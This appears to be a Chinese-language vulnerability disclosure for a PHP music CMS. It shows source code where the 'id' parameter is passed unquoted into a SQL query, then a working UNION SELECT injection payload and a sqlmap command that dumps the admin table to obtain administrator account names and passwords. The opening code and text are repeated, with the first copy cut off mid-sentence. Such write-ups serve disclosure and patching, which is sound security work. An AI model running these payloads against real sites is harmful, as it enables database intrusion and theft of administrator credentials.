<ul><li>/source/connect/callback.php</li></ul><pre class="">close_browse(); $CD_ID=SafeRequest("id","get"); global $db; $sql="select * from ".tname('music')." where CD_ID=".$CD_ID; if($row=$db->getrow($sql)){ if($row['CD_Server']<>0){ $server=$db->getrow("select * from ".tname('server')." where CD_ID=".$row['CD_Server']); $player=$server['CD_Url'].$row['CD_Url']; }else{ $player=$row['CD_Url']; } if(substr($player,-4)==".jpg"){ $type=substr($player,-7,3); }else{ $type=substr($player,-3); } echo "<list><m type=\"".$type."\" src=\"".$player."\" label=\"".$row['CD_Name']." - ".GetSingerAlias("qianwei_singer","CD_Name","CD_ID",$row['CD_SingerID'])."\" image=\"".LinkPicUrl($row['CD_Pic'])."\" _id=\"".$row['CD_ID']."\" /></list>"; } ?> </pre><p>id未过滤直接带入SQL语句中,没有单引号保护。当用户传入值为:<br></p><pre class="">id=1%20UNION%20SELECT%20user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</pre><p>执行的SQL语句为:</p><pre class="">select * from...
<ul><li>/source/connect/callback.php</li></ul><pre class="">close_browse(); $CD_ID=SafeRequest("id","get"); global $db; $sql="select * from ".tname('music')." where CD_ID=".$CD_ID; if($row=$db->getrow($sql)){ if($row['CD_Server']<>0){ $server=$db->getrow("select * from ".tname('server')." where CD_ID=".$row['CD_Server']); $player=$server['CD_Url'].$row['CD_Url']; }else{ $player=$row['CD_Url']; } if(substr($player,-4)==".jpg"){ $type=substr($player,-7,3); }else{ $type=substr($player,-3); } echo "<list><m type=\"".$type."\" src=\"".$player."\" label=\"".$row['CD_Name']." - ".GetSingerAlias("qianwei_singer","CD_Name","CD_ID",$row['CD_SingerID'])."\" image=\"".LinkPicUrl($row['CD_Pic'])."\" _id=\"".$row['CD_ID']."\" /></list>"; } ?> </pre><p>id未过滤直接带入SQL语句中,没有单引号保护。当用户传入值为:<br></p><pre class="">id=1%20UNION%20SELECT%20user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</pre><p>执行的SQL语句为:</p><pre class="">select * from prefix_music where CD_ID=1 UNION SELECT user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</pre><p>页面返回: </p><p><img alt="ED193249-4A94-4C53-9DA7-A3D772CA4518.png" src="https://images.seebug.org/@/uploads/1434080551711-ED193249-4A94-4C53-9DA7-A3D772CA4518.png" data-image-size="835,92"><br></p><p>证明漏洞存在。</p><p>使用SQLMap获取管理员的帐号密码,使用命令:</p><pre class="">python sqlmap.py -u "http://10.211.55.4/qianwei/source/plugin/player/player.php?id=1" -p id --referer="http://10.211.55.4/qianwei/" --dbms=mysql --technique=U -D qianwei -T prefix_admin –dump</pre><p><img alt="F3DCAAE5-A31F-491E-94F8-B5105F9886D6.png" src="https://images.seebug.org/@/uploads/1434080600108-F3DCAAE5-A31F-491E-94F8-B5105F9886D6.png" data-image-size="847,721"><br></p><p>得到管理员的帐号密码:</p><p><img alt="CE280973-FABE-40B9-A9F0-F79669CAE570.png" src="https://images.seebug.org/@/uploads/1434080609731-CE280973-FABE-40B9-A9F0-F79669CAE570.png" data-image-size="1014,709"><br></p>
